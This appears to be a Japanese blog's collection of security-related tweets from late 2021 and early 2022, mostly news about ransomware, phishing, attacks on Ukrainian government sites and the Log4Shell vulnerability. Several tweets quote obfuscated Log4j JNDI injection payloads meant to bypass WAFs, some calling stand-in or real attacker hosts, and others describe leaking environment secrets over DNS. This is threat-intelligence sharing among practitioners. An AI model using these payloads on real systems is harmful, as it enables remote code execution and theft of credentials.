サイバー保険を不要と考える場合は、NISTやCMMC（サイバーセキュリティ機能成熟度モデル認定）を取り入れる事を推奨しています。一方で保険加入条件も年々（海外では）厳しくなっています。「ビジネスの視点：サイバーセキュリティ保険はビジネスに必要と思われる」 https://t.co/0prQmtz0TP
— キタきつね (@foxbook) Jan 9, 2022

ECサイトからのカード情報窃取より、フィッシングの方が被害が多い。。。 “カード情報”盗むフィッシング詐欺が急増（日本テレビ系（NNN）） #Yahooニュース https://t.co/rmg3g2wY3I
— キタきつね (@foxbook) Jan 11, 2022

昨年1年間、観察・記録したランサムに関するまとめをブログに書きました。標的型ランサム観察記 2021年振り返り版全体編 | (n)inja csirt https://t.co/UrZiJCnHTz https://t.co/GPkHJIoOah
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Jan 12, 2022

食べログ、裁判でアルゴリズム「異例」の開示　評価透明化なるか | 毎日新聞 https://t.co/0sT6GLL3E9
— piyokango (@piyokango) Jan 12, 2022

ランサム攻撃を受けたらどうする？ JPCERT/CCが初動対応FAQを公開 https://t.co/5HdkX5ir8Q
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Jan 13, 2022

API Security Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API. https://t.co/h1fMATbzwA #cybersecurity #api #hacking #bughunting https://t.co/Q5GQ9nLxg8
— Devansh (?, ??) (@0xAsm0d3us) Jan 13, 2022

サイバー攻撃の高度化に伴い、セキュリティ担当者にも高度なスキルが求められるようになりました。そのスキルを証明するための、セキュリティ資格について、どんな種類があって、それぞれどのような取得メリットがあるのかを解説しました！ https://t.co/aXNMPIA4A5
— NRIセキュア公式 (@NRIST) Jan 14, 2022

現在ウクライナの政府系サイトが複数ハッキングを受け、落ちて開けないか、こんな奇妙な反ウクライナ画像が表示されている（これは農業政策省サイト）。内容は、「ウクライナ人（※単数系）よ！全ての個人情報は公開ネットワーク上にアップロードされた…更なる悪い事態を恐れて待て」と書かれている。 https://t.co/6hvG2nBX8w
— Hirano Takashi / 平野高志 (@hiranotakasi) Jan 14, 2022

ウクライナ政府サイトに大規模サイバー攻撃　写真1枚　国際ニュース：AFPBB News https://t.co/cde361pcto
— piyokango (@piyokango) Jan 14, 2022

〈独自〉閲覧履歴提供に本人同意　ＬＩＮＥ問題受けＩＴ規制案判明 - 産経ニュース https://t.co/rY31Azp35Q
— piyokango (@piyokango) Jan 13, 2022

Russian government arrests REvil ransomware gang members - @Ionut_Ilascu https://t.co/vXq033CHS0
— BleepingComputer (@BleepinComputer) Jan 14, 2022

#Emotet 2022-01-14 Spamming activities continues on Epoch 5 We have updated https://t.co/KPe1mUckkN database with 2022-01-13 data and ioc In the graph below the top 10 of TLD recipient, new entry United Arab Emirates with a lot of reply-chain @58_158_177_102 @sugimu_sec @bomccss https://t.co/lh7Pvim5YD
— TG Soft (@VirITeXplorer) Jan 14, 2022

ハッカー攻撃にベラルーシ情報機関関与、ウクライナ高官が指摘 https://t.co/LJqgh4qGMW
— ロイター (@ReutersJapan) Jan 16, 2022

2021-12-30

2021/12/30 セキュリティ関連Twitterメモ

セキュリティ関連メモ

Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF : https://t.co/f3Fi7E34TY
— H4x0r-DZ (@h4x0r_dz) Dec 11, 2021

Apache Log4j2 2.14.1 RCE (CVE-2021-44228) ??Bypass WAF 1. ${jndi:ldap://127.0.0.1:1389/ badClassName} 2. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} 3. ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} 4. ${jndi:rmi://adsasd.asdasd.asdasd}
— Jinwook Kim (@wugeej) Dec 12, 2021

これ、見る人がみればわかりますが、環境変数にAWS ACCESS KEYを設定している物をみつけて情報を摂取するものですね。名前解決をした時点でホストにKEY VALUEが載ってくるので、次の攻撃へと悪用するかと。 https://t.co/Gj5VgHTIlP
— hiro_ (@papa_anniekey) Dec 14, 2021

立法趣旨からは違法でないはずだが検挙されてしまう可能性があるのが現状、とでも書いてほしいところ / “「Log4j」の脆弱性を突く攻撃手段の情報共有は違法？　日本ハッカー協会に聞いた” https://t.co/hRPfZkBYV6
— 徳丸浩 (@ockeghem) Dec 14, 2021

IC乗車券の利用日が約20年前になる障害、要因はGPS「週番号」のリセット https://t.co/lY50rvg4TL
— にゃん☆たく (@taku888infinity) Dec 14, 2021

MDIS、「統合認証サービス MistyAuth」を2022年4月から提供 https://t.co/2byZVgeD2B
— モグ｜セキュリティゼネラリスト (@moneymog) Dec 14, 2021

この辺の動きは当然犯罪者もチェックしてるでしょうね。みずほ銀行のQRコード決済「J-Coin Pay」　全国74の信用組合と口座接続開始 - ITmedia ビジネスオンライン https://t.co/c3kYAtXeac
— Autumn Good (@autumn_good_35) Dec 14, 2021

一番わかりやすい図解かと #log4shell #log4j https://t.co/Un40iU7VqZ
— 無気力マン (@__motojiro__) Dec 12, 2021

Scutumでは12/11時点でLog4j攻撃の難読化に対応が済んでいます。シグネチャ型のWAFだと難しそうですが、ウチは色々やれるので… https://t.co/ljXqa0oUzU
— Kanatoko (@kinyuka) Dec 13, 2021

Log4Shell脆弱性に対する追加の対処が施された「Apache Log4j 2.16.0」がリリース - 窓の杜 https://t.co/9tDh7RcnEx @madonomoriより
— にゃん☆たく (@taku888infinity) Dec 14, 2021

SECCON CTF 2021 writeup - st98 の日記帳 - コピー https://t.co/akm1PW6u39 書きました
— st98 (@st98_) Dec 14, 2021

Log4j の脆弱性の Port53 で通信を試行しようとしているもの。（自宅のサーバにもこのパターンが着信したのでぺたり） https://t.co/8QSkwuayCS
— みむら (@mimura1133) Dec 15, 2021

なんかやってみた https://t.co/V9ShcymhZG
— hiro_ (@papa_anniekey) Dec 15, 2021

#Emotet のメール送信は12/10以降確認してません。 Emotetが11/26,30,12/7に使っていたAdobeを騙ったアプリインストーラーによる感染手法ですが、使われていた脆弱性 CVE-2021-43890 が本日配信された12月のWindowsUpdateで修正されましたので早期に更新しましょう。 https://t.co/WjW7Fvs82n
— bom (@bomccss) Dec 15, 2021

Ohh, the Russian IP that's doing Windows AD user recon switched to obfuscating "jndi" too: 45.146.164.160 - - [14/Dec/2021:07:18:35 +0200] "GET / HTTP/1.1" 403 135 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}"
— Vess (@VessOnSecurity) Dec 14, 2021

「Log4Shell」攻撃、少なくとも12月初頭より展開 - PoC公開以前についても確認を https://t.co/LxBiF22jGx 『現地時間12月2日には同脆弱性に関する攻撃者の活動が観測されていたことを明らかにし、同脆弱性に対する探索行為や悪用など調査する場合は、数週間前までさかのぼって調べるよう呼びかけた』
— にゃん☆たく (@taku888infinity) Dec 15, 2021

マカフィー、「2021年の10大セキュリティ事件」を発表、第1位は？ https://t.co/bneTqxXNye
— モグ｜セキュリティゼネラリスト (@moneymog) Dec 15, 2021

Just bypassed AWS WAF for log4j jndi injection: ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Anyone who care to share Akamai Bypass? #bugbountytips https://t.co/QaoavD326z
— xxux11 ? ? (@11xuxx) Dec 15, 2021

鳥取県のシステムにサイバー攻撃ファイル暗号化される被害｜NHK 鳥取県 https://t.co/eBLCaii6D1 “被害にあったのは、県が東京の建設コンサルタント会社に運用を委託し、県内の森林所有者およそ５万人分の名前や、民有林の情報などを保管している「鳥取県森林クラウドシステム」というシステムです”
— ねこさん?(ΦωΦ) (@catnap707) Dec 16, 2021

Log4jの件では珍しく(?)難読化によるWAFの回避が話題になっていましたが、その辺についてブログ書いてみました。Scutumでは今回はシグネチャ・正規表現で頑張るのはキツイと判断して、独自にパーサを書いて対応しています。 https://t.co/r2Kkmjy4vS
— Kanatoko (@kinyuka) Dec 16, 2021

CERT/CC has released a Log4Shell scanner https://t.co/6SxzSwOTbR https://t.co/zHdTWcKVEf
— Catalin Cimpanu (@campuscodi) Dec 16, 2021

CVE-2021-45105（DoS 脆弱性。CVSS値は 7.5）がまた1つ見つかり（lookupの無限再帰を起こすパターンが見つかった）、Log4jは2.17.0に…。Shellshockの時のbash泥沼修正の再来？ / Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability https://t.co/0O7E1aUeMI via @TheHackersNews
— wakatono, Ph.D.(JK)(Fully Vaccinated)(3末までに休暇11日） (@wakatono) Dec 18, 2021

Looks like it’s missing the step where you post something on Twitter #log4j #logforge #l4j https://t.co/6zzGdpSuu0
— pwneip (@pwnEIP) Dec 18, 2021

Fridaを用いてマルウェアの動作を解析・変更する - NTT Communications Engineers' Blog https://t.co/7kPeipuWLV
— ほよたか (@takahoyo) Dec 21, 2021

obj_31337 skimmer via bootstrap2[.]xyz. Malicious JavaScript is hidden within victim's own logo. #Magecart https://t.co/86NpKF4CB9
— Malwarebytes Threat Intelligence (@MBThreatIntel) Dec 20, 2021

Nmap Cheatsheet for OSCP #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #linux #unix #nmap https://t.co/APWxN2nP9v
— Hacking Articles (@hackinarticles) Dec 21, 2021

Alert (AA21-356A) Mitigating Log4Shell and Other Log4j-Related Vulnerabilities https://t.co/KKJnEIBgcW
— piyokango (@piyokango) Dec 23, 2021

The day when the AWS Support got access to your S3 data. In this thread, you will find details about the security incident that leads to this unattended access for millions of AWS customers. ??
— Victor Grenu (@zoph) Dec 23, 2021

Log4j RCE CheatSheet https://t.co/wUNXWKiYf5
— LetsDefend (@LetsDefendIO) Dec 22, 2021

「Apache Log4j」の脆弱性を中国政府に最初に報告しなかったとしてAlibaba Cloudにペナルティ https://t.co/jTlGgRgu46
— モグ｜セキュリティゼネラリスト (@moneymog) Dec 23, 2021

Microsoft MSHTMLの脆弱性「CVE-2021-40444」に対する修正パッチを回避する新たな攻撃 | TECH+ https://t.co/pnlqmwOfgI
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Dec 25, 2021

【独自】日米、「ランサムウェア」対策で連携へ…中露のサイバー攻撃を意識 : 政治 : ニュース : 読売新聞オンライン https://t.co/t9Fb5ViTr2
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Dec 26, 2021

JNSA版の十大ニュース。これを見ても、今年「も」色々あったなと思います。 JNSA 2021 セキュリティ十大ニュース発表、「ランサムウェアの脅威」「LINEデータ管理不備」「みずほ銀行」他 https://t.co/Z2hofX3QxR
— キタきつね (@foxbook) Dec 27, 2021

書きました＞スクリーンショットによるツイート引用は著作権侵害との判決（栗原潔） - 個人 - Yahoo!ニュース https://t.co/N1XZ0yZD3C
— Kiyoshi Kurihara (@kurikiyo) Dec 29, 2021

この判決だとテレビがツイートを無断引用するのは全て著作権侵害だな。（著作権法の引用の趣旨がそんなものなわけがなかろうて。） https://t.co/wTEPfbxH6m
— Hiromitsu Takagi (@HiromitsuTakagi) Dec 29, 2021

2021-12-12

2021/12/12 セキュリティ関連Twitterメモ

セキュリティ関連メモ

I've just published "MAS" Article 1 -- version 1.1. As I'd simplified the original script on page 30, I left (by mistake) two dead lines there (now both removed) The new version (A.1) of the PDF (and next updates) will be published here: https://t.co/CqJcmTzygA #malware https://t.co/JASeRCzxKA
— Alexandre Borges (@ale_sp_brazil) Dec 4, 2021

11月の #ランサムウェアリーク確認数カッコ内は前月確認数 1???#Lockbit2 86(82) 2???#CONTI 47(46) 3???#Grief 10(15) 4???#CL0P 5(11) 5???#BlackMatter 1(12) 6???#Ragnar 1(2) 7???#RansomExx 1(1) 8???#Revil 0(3) 9???#Nefilim 0(0) 9???#Prometheus 0(0) 9???#DoppelPaymer 0(0) Total 151 https://t.co/vTFTCxjISw
— 辻伸弘 (nobuhiro tsuji) (@ntsuji) Dec 5, 2021

CVE数の動向と考察（2021年版）Part1 https://t.co/lSc6zxyUGj
— piyokango (@piyokango) Dec 6, 2021

おお！事業者（LINE、Yahoo!、PayPay/PayPay銀行）共催のフィッシング詐欺サイトバウンティキャンペーンですか！これは素晴らしい企画。意外と他で実施していないですよね？私が知らないだけ？参加方法も手軽なのが素晴らしい。 https://t.co/XasHqaCwHb
— Noriaki Hayashi (@v_avenger) Dec 6, 2021

Best of CTF Walkthrough for OSCP https://t.co/AIUdoUaDV6 https://t.co/JxuTswFwbn https://t.co/HLfe9mGFVN #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #ctf #BlueTeam #itsecurity #cissp #redteam #hackingtools #linux https://t.co/j7ZQyBwQxl
— Hacking Articles (@hackinarticles) Dec 7, 2021

『「次の１日間、ＢＴＣに送られるすべての支払いを２倍にします。あなたは１０００ドル送ります。私はあなたに２０００ドル送り返します」』アンジャッシュ渡部、インスタに不正アクセスか？ストーリーに怪しげ文書アップ/芸能/デイリースポーツ online https://t.co/jDLK6FpiCe
— Autumn Good (@autumn_good_35) Dec 7, 2021

Love this Ransomware Playbook published by Canadian Centre for Cyber Security: https://t.co/8TA0xZl4wK https://t.co/PADQ2phAgi
— Seongsu Park (@unpacker) Dec 7, 2021

GitHub上のsensitive dataを削除するための手順と道のり https://t.co/I86XBcoJvt
— モグ｜セキュリティゼネラリスト (@moneymog) Dec 7, 2021

フィッシング詐欺やマルウェアなど、セキュリティ対策の最新動向を専門家らが解説【JPAAWG 4th General Meeting】 - INTERNET Watch https://t.co/HJWWYh4GNq @internet_watchより
— にゃん☆たく (@taku888infinity) Dec 8, 2021

ランサムウエア配信システムに危機感 - 2022年版ソフォス脅威レポート https://t.co/027539M2yD
— モグ｜セキュリティゼネラリスト (@moneymog) Dec 8, 2021

GitHub上のsensitive dataを削除するための手順と道のり | メルカリエンジニアリング https://t.co/5MwS26C7qq
— piyokango (@piyokango) Dec 9, 2021

オミクロン株で偽メール　厚労省装い、情報流出恐れ｜共同通信 https://t.co/Jc54sVNEz4
— piyokango (@piyokango) Dec 9, 2021

log4j 各?网?已?笑死 ???史了 https://t.co/erJvuze4Sn
— ?面 (@zhimian000) Dec 9, 2021

RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec https://t.co/hxoTYC5nSt Javaでログ出力するために使われるライブラリlog4j 2のRCEの0-day脆弱性がやばそう。裏で実はlog4j 2を使っているということもありそうなので、影響範囲を特定するのが難しそう
— ほよたか (@takahoyo) Dec 10, 2021

log4jのセキュリティバグ、すごいな。任意コード実行というけど、ほんとに任意コード実行じゃん（インターネットから簡単に任意のJavaクラスファイルをロードして実行させられる）。
— Rui Ueyama (@rui314) Dec 10, 2021

マイクラもハッキング～「Apache Log4j」ライブラリに致命的なリモートコード実行のゼロデイ脆弱性／かなり広範囲に影響か。一刻も早い対策が望まれる【やじうまの杜】 https://t.co/lUUfGMhVIp https://t.co/kKVe89M8kk
— 窓の杜 (@madonomori) Dec 10, 2021

Best of OSINT Cheatsheet (Part 2) Credit https://t.co/9QY8ncwRqY #infosec #cybersecurity #pentesting #oscp #cheatsheet #informationsecurity #hacking #cissp #redteam #hackingtools #Windows #DataSecurity #privacy #OSINT https://t.co/Y6wZ4cVigL
— Hacking Articles (@hackinarticles) Dec 10, 2021

きたよ。。。 #log4j #log4j2 https://t.co/u1wJ8rB6z3
— moto_sato (@58_158_177_102) Dec 10, 2021

Welp. (log4j is incredibly common, although it sounds like the underlying vulnerability stems from people essentially directly printf-ing strings from users, like printf(user_string) instead of printf("%s", user_string).) https://t.co/zjLigHU0Mn
— Xenoveritas (@xenoveritas) Dec 10, 2021

log4j2の件、 - 情報をキャッチできるアンテナがある - 一次情報から攻撃方法と影響を読み取れる - 対象システムを即時に調査できる権限がある - Javaのクラスローダーについて知識がある - Javaのロギング事情がカオスなことを知っているという条件が揃ったエンジニアが必要なので多分沢山やられる。
— 嶋田大貴 (@shimariso) Dec 10, 2021

ちゃんと読まないとだめだな https://t.co/XIJo5Q9bYK
— イスラエルいくべぇ (@knqyf263) Dec 10, 2021

log4j、修正コミット見ればわかるんですが、"jndi:ldap:/"だけじゃなくて"jndi:dns:/"も効きました。脆弱性の有無調査を行うだけの攻撃ではこちらも使われると思うので、ログ調査する人は気を付けて (画像はlog4j同梱のGhidraで検証した) https://t.co/3x3stiN4Aw https://t.co/8rCe5QBmCf
— しゅーと (@shutingrz) Dec 10, 2021

もうこれインターネットの終わりでしょ https://t.co/2IuBTLyLHx
— イスラエルいくべぇ (@knqyf263) Dec 10, 2021

Log4j zero-day gets security fix just as scans for vulnerable systems ramp up https://t.co/OFAjCxjS3i
— piyokango (@piyokango) Dec 10, 2021

“log4jの脆弱性について” https://t.co/eCVcy9Su8v
— トマ村 (@tmhwq) Dec 10, 2021

CVE-2021-44228 - Log4j RCE 0-day mitigation with Cloudflare. https://t.co/aP4ZEAQL8H
— Cloudflare (@Cloudflare) Dec 10, 2021

SANSのInternet Storm CenterのThret LevelがYellowになってる。見始めたのはここ数年だけど、初めて見たかもしれない https://t.co/qtUDeYSRPn https://t.co/FFDDQ9np2A
— ほよたか (@takahoyo) Dec 10, 2021

思ったより拡散されてたのでコメントしますが、このdnsを使うのは元ツイにあるように「脆弱性の有無調査を行うだけ」を目的とした人だけです。名前解決が発生するだけで、これを利用してJNDIインジェクションはできません。これを読んでdnsでRCEできると思った人がいるっぽいので念のため...
— しゅーと (@shutingrz) Dec 10, 2021

各種情報が追加されたので補足。情報漏えいを目的とする攻撃でもdnsを使われると思います。あくまでdns スキーマで効かないのはJNDIインジェクション。画像は環境変数のMYSQL_PASSWORDを名前解決をさせて情報漏えうさせる通信です。 https://t.co/YVDaBTlIhu
— しゅーと (@shutingrz) Dec 11, 2021

『dns』文字列では、RCEまで行かず、情報漏洩にはつながりそうな状況のようです。参照される方は、しゅーとさんの返信内容まで合わせて確認いただけると良いと思います。 https://t.co/eC4IuYHBQT
— モグ｜セキュリティゼネラリスト (@moneymog) Dec 11, 2021

海外主要ソースが軒並みLog4jを報じています。あっ。怖い事書いてあるな・・・。「Log4j RCE：広く使用されているロギングユーティリティの重要な認証なしのコード実行ホールを塞ぐために発行された緊急パッチ」 https://t.co/LIbRFI5zem
— キタきつね (@foxbook) Dec 10, 2021

@hasegawayosukeさん、@kinugawamasatoさん、にしむねあさんとWebセキュリティやキャリアについて雑談しました！ https://t.co/AudR2PYn2q
— Jun Kokatsu (@shhnjk) Dec 10, 2021

If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} This gets past every filter I've found so far. There's no shortage of these bypasses. #log4j
— Brandon Forbes (@Rezn0k) Dec 11, 2021

Log4j2のコード実行脆弱性Log4Shell (CVE-2021-44228)についてのCrowdStrike記事。既に実際の悪用が確認されている。最新版ではJNDIセッションセキュリティ管理の制御設定が追加。NWでの推奨緩和策は、サーバからの外向き通信は信頼できるホスト・プロトコルのみとすること。 https://t.co/uMIxjTTUeZ
— kokum?t? (@__kokumoto) Dec 11, 2021